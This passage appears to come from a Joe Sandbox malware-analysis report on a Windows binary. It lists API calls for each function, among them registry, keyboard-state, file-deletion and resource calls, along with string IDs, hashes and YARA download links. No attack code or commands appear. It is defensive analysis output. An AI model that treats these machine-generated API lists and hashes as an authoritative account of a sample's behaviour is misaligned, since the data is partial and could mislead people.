                                                                                                                              • Instruction Fuzzy Hash: 0F517871900109BBDB19FBE0DD46EEEB779AF28704F108165F509B20A1EB715F54DBA0
                                                                                                                              Function 001BD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 001BD37F
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001BD3A0
                                                                                                                              • __swprintf.LIBCMT ref: 001BD3F3
                                                                                                                              • _wprintf.LIBCMT ref: 001BD499
                                                                                                                              • _wprintf.LIBCMT ref: 001BD4B7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2116804098-3420473620
                                                                                                                              • Opcode ID: e22877ee82e00f3f111fc60f11587dadaa323aeec66e3fca397f4464934d3848
                                                                                                                              • Instruction ID: b86de3a7d54086567c4525420d63f85498ffa383a923d0357c5494d8992cb125
                                                                                                                              • Opcode Fuzzy Hash: e22877ee82e00f3f111fc60f11587dadaa323aeec66e3fca397f4464934d3848
                                                                                                                              • Instruction Fuzzy Hash: 6551B972900209BBCB19FBE0DD46EEEB779AF24700F108455F109720A1EB756F58DB60
                                                                                                                              Function 001AAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • _memset.LIBCMT ref: 001AAF74
                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001AAFA9
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001AAFC5
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001AAFE1
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001AB00B
                                                                                                                              • CLSIDFromString.COMBASE(?,?), ref: 001AB033
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001AB03E
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001AB043
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                              • Opcode ID: c6ea1eece5109b33644fb89d2783ba6ff468158c41c7341123fad0cfb5d52bd9
                                                                                                                              • Instruction ID: bd8967f78127935eaaa490dcd9d3f07ce339f1d3b2c683e0d7f5bcbb491b016c
                                                                                                                              • Opcode Fuzzy Hash: c6ea1eece5109b33644fb89d2783ba6ff468158c41c7341123fad0cfb5d52bd9
                                                                                                                              • Instruction Fuzzy Hash: 89412A76C1022DBBCF11EBA4EC85DEEB779BF18704F408069F915A21A1EB719E44CB90
                                                                                                                              Function 001B7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __swprintf.LIBCMT ref: 001B7226
                                                                                                                              • __swprintf.LIBCMT ref: 001B7233
                                                                                                                                • Part of subcall function 0019234B: __woutput_l.LIBCMT ref: 001923A4
                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001B725D
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001B7269
                                                                                                                              • LockResource.KERNEL32(00000000), ref: 001B7276
                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 001B7296
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001B72A8
                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 001B72B7
                                                                                                                              • LockResource.KERNEL32(?), ref: 001B72C3
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001B7322
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                              • String ID: L6"
                                                                                                                              • API String ID: 1433390588-3669851431
                                                                                                                              • Opcode ID: 455839187f5203731210c3db392cf689e83efac028da20c9092c54be4a887592
                                                                                                                              • Instruction ID: c06cfea5452ee0aed31cc1ef5c7cdc340a858be2d872dc35baf02d4011b88b5f
                                                                                                                              • Opcode Fuzzy Hash: 455839187f5203731210c3db392cf689e83efac028da20c9092c54be4a887592
                                                                                                                              • Instruction Fuzzy Hash: 88317EB590425AABDB059F60EC89AFF7BA9FF48341F144425FD02E61A0E734D960DAA0
                                                                                                                              Function 001B83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001B843F
                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001B8455
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001B8466
                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001B8478
                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001B8489
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$_memmove
                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                              • API String ID: 2279737902-1007645807
                                                                                                                              • Opcode ID: fa65694fcbbe9a607f1edb581b67a769e8cb49bfb6525266a5c9daddb830bf0b
                                                                                                                              • Instruction ID: 40cb6a4c6dd1d6cfa747df650716af40eca4bb2ffa03537701966d32b37f4b82
                                                                                                                              • Opcode Fuzzy Hash: fa65694fcbbe9a607f1edb581b67a769e8cb49bfb6525266a5c9daddb830bf0b
                                                                                                                              • Instruction Fuzzy Hash: E111C461A6026D79D720E7E1DC4AEFFBA7CEBA2F04F004829B411A60D0DFA05E44C5B1
                                                                                                                              Function 001B8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • timeGetTime.WINMM ref: 001B809C
                                                                                                                                • Part of subcall function 0018E3A5: timeGetTime.WINMM(?,7694B400,001E6163), ref: 0018E3A9
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 001B80C8
                                                                                                                              • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 001B80EC
                                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 001B810E
                                                                                                                              • SetActiveWindow.USER32 ref: 001B812D
                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001B813B
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 001B815A
                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 001B8165
                                                                                                                              • IsWindow.USER32 ref: 001B8171
                                                                                                                              • EndDialog.USER32(00000000), ref: 001B8182
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                              • String ID: BUTTON
                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                              • Opcode ID: 1c7a5480b87547f3d572188d2b19d1cddd487bf45d5d046057bb3afd3ec7fed6
                                                                                                                              • Instruction ID: 858e7d82920993a869e486aaded0e4759b8b92939136dcd95fc592f670f94a43
                                                                                                                              • Opcode Fuzzy Hash: 1c7a5480b87547f3d572188d2b19d1cddd487bf45d5d046057bb3afd3ec7fed6
                                                                                                                              • Instruction Fuzzy Hash: 86218EB0210204BFE722AB65FC8DA7A3BAFFB14B89B040115F61182671CF768E45CB21
                                                                                                                              Function 001BC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001BC6A0: __time64.LIBCMT ref: 001BC6AA
                                                                                                                                • Part of subcall function 001741A7: _fseek.LIBCMT ref: 001741BF
                                                                                                                              • __wsplitpath.LIBCMT ref: 001BC96F
                                                                                                                                • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
                                                                                                                              • _wcscpy.LIBCMT ref: 001BC982
                                                                                                                              • _wcscat.LIBCMT ref: 001BC995
                                                                                                                              • __wsplitpath.LIBCMT ref: 001BC9BA
                                                                                                                              • _wcscat.LIBCMT ref: 001BC9D0
                                                                                                                              • _wcscat.LIBCMT ref: 001BC9E3
                                                                                                                                • Part of subcall function 001BC6E4: _memmove.LIBCMT ref: 001BC71D
                                                                                                                                • Part of subcall function 001BC6E4: _memmove.LIBCMT ref: 001BC72C
                                                                                                                              • _wcscmp.LIBCMT ref: 001BC92A
                                                                                                                                • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF49
                                                                                                                                • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF5C
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001BCB8D
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001BCC24
                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001BCC3A
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001BCC4B
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001BCC5D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 152968663-0
                                                                                                                              • Opcode ID: 6537d076dfdb223ce8a79025b8a8a334d0af7c7ea412f5fa7a89481aa33a80f3
                                                                                                                              • Instruction ID: c25690b72217ce43790abe6e0270de9bc882147c836805af7a71ee2a6340c298
                                                                                                                              • Opcode Fuzzy Hash: 6537d076dfdb223ce8a79025b8a8a334d0af7c7ea412f5fa7a89481aa33a80f3
                                                                                                                              • Instruction Fuzzy Hash: 82C12EB1900119AEDF15DFA5CC81EEEBBBDEF69310F0040AAF609E6151D7709A84CFA5
                                                                                                                              Function 001C08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3566271842-0
                                                                                                                              • Opcode ID: df43cf1a87a530368e83b0f667970840fbb65e8f23c62b2b1af0b1209d07677b
                                                                                                                              • Instruction ID: 805d09d6a4d3116121f2c71dc2c42e2c2c44c26ec7cfcc440e2d004e578e9c1d
                                                                                                                              • Opcode Fuzzy Hash: df43cf1a87a530368e83b0f667970840fbb65e8f23c62b2b1af0b1209d07677b
                                                                                                                              • Instruction Fuzzy Hash: 13711D75A00219EFDB15DFA4D888EDEB7B9EF58314F048099E919AB251DB30EE40CF90
                                                                                                                              Function 001B388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B3908
                                                                                                                              • SetKeyboardState.USER32(?), ref: 001B3973
                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 001B3993
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 001B39AA
                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 001B39D9
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 001B39EA
                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 001B3A16
                                                                                                                              • GetKeyState.USER32(00000011), ref: 001B3A24
                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 001B3A4D
                                                                                                                              • GetKeyState.USER32(00000012), ref: 001B3A5B
                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 001B3A84
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 001B3A92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: 97abc8e07446f214e7b7b90d2e9330d1f3088114ff0ecb1f59e8b5f15f88c2bd
                                                                                                                              • Instruction ID: fdb7be33248b7dd91eb89b9344ac431c4e662509111aa56a618cd425c007b4da
                                                                                                                              • Opcode Fuzzy Hash: 97abc8e07446f214e7b7b90d2e9330d1f3088114ff0ecb1f59e8b5f15f88c2bd
                                                                                                                              • Instruction Fuzzy Hash: 3351F720A0878429FB35EBB488117EABFB45F11740F48858DD5D29B1C3DB54AB9CC762
                                                                                                                              Function 001AFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 001AFB19
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001AFB2B
                                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001AFB89
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 001AFB94
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001AFBA6
                                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001AFBFC
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 001AFC0A
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001AFC1B
                                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001AFC5E
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 001AFC6C
                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001AFC89
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 001AFC96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3096461208-0
                                                                                                                              • Opcode ID: 075220b756c3f4184b4a42ea2b58d1b326ffaefa82112515684dde9e6e82f696
                                                                                                                              • Instruction ID: 2d26b8f73ade3b8d1778d71d09093ac203a3585068557c8aaa83cd19e8303e9a
                                                                                                                              • Opcode Fuzzy Hash: 075220b756c3f4184b4a42ea2b58d1b326ffaefa82112515684dde9e6e82f696
                                                                                                                              • Instruction Fuzzy Hash: 4B512DB5B00209AFDB18CFA9DD95ABEBBBAEB88310F14812DB915D7690D7709D41CB10
                                                                                                                              Function 0018B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0018B067
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ColorLongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 259745315-0
                                                                                                                              • Opcode ID: cf8551bb02aedac9088d0ac2036bfb1363162636d816f7ba4de5ca3f1934c0b2
                                                                                                                              • Instruction ID: da4bfd1b31d3aca414334a0d940b72ef7ab72acebaf8af61154f5f8c196e4ffd
                                                                                                                              • Opcode Fuzzy Hash: cf8551bb02aedac9088d0ac2036bfb1363162636d816f7ba4de5ca3f1934c0b2
                                                                                                                              • Instruction Fuzzy Hash: 4F41A131108544AFDB246F38EC88BBA3BB6AB06731F184265FD758A1E1D7318D81DF21
                                                                                                                              Function 001B7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 136442275-0
                                                                                                                              • Opcode ID: 09c4386dd206ff8339d6739f8534fe8a56871d2e68c3f9c11a0253984e520e37
                                                                                                                              • Instruction ID: 60e9d8e6cb79116ad828ad17caf42a72dd71e6916e3a163bf2e11e486bd3813b
                                                                                                                              • Opcode Fuzzy Hash: 09c4386dd206ff8339d6739f8534fe8a56871d2e68c3f9c11a0253984e520e37
                                                                                                                              • Instruction Fuzzy Hash: B041FFB290412CAADF25EB50CC55EDE73BCBB58314F1041E6F519A2091EB71ABD4CF60
